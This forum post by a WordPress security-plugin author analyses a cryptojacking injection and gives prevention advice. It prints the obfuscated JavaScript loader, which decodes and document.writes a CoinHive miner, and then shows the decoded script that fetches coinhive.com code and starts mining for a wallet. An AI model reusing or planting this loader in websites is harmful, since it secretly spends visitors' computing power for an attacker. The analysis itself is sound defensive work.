Analysis of an embedded javascript cryptocurrency miner

  • Plugin Author te_taipo

    (@te_taipo)


    6 years, 6 months ago

    Unfortunately the combination of weak content management security combined with CoinHive have made it quite easy for attackers to embed cryptocurrency miners into webpages. Using obfuscated code, malware authors are able to insert javascript into pages that evade detection because the payload is not activated until a user loads the webpage via their web browser.

    This again is a case for prevention rather than cure. Preventing the injection of rogue code into a database is the first and last defense.

    Searching for rogue code in this instance would be difficult to detect, as it is common for many themes and plugins to call for external files such as javascript librarys to assist in compiling the functionality of a webpage therefore can easily lead to false positives.

    Use: Embeded into webpages

    <script type='text/javascript' src="https://xxxxxxx.com/xxxxxxx"></script>

    Payload:

    (function (id){
var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!~*<njofs/tubsu)*<=0tdsjqu?";
var res = "";
var stringLength = s.length;
var flag = false;
for(var i = 0; i < stringLength; i++){
if(s.charCodeAt(i) == 40){
if(flag) continue;
res += "\'" + id;
flag = true;
}
res += String.fromCharCode(s.charCodeAt(i)-1);
}
document.write(res);
})('miners wallet address');

    Decodes to:

    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('miners wallet address', { throttle: 0.2 });miner.start();</script>

    To prevent any rogue code being injected into your website files, or unauthorised files being added to your WordPress files repository, keep your WordPress website, themes and plugins up to date, choose themes and plugins carefully, use secure webhosting.

    Some security addons like Pareto Security can capture attempts to append code into WordPress, but none of these are as effective as following the above advice.

    • This topic was modified 6 years, 6 months ago by te_taipo.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Analysis of an embedded javascript cryptocurrency miner’ is closed to new replies.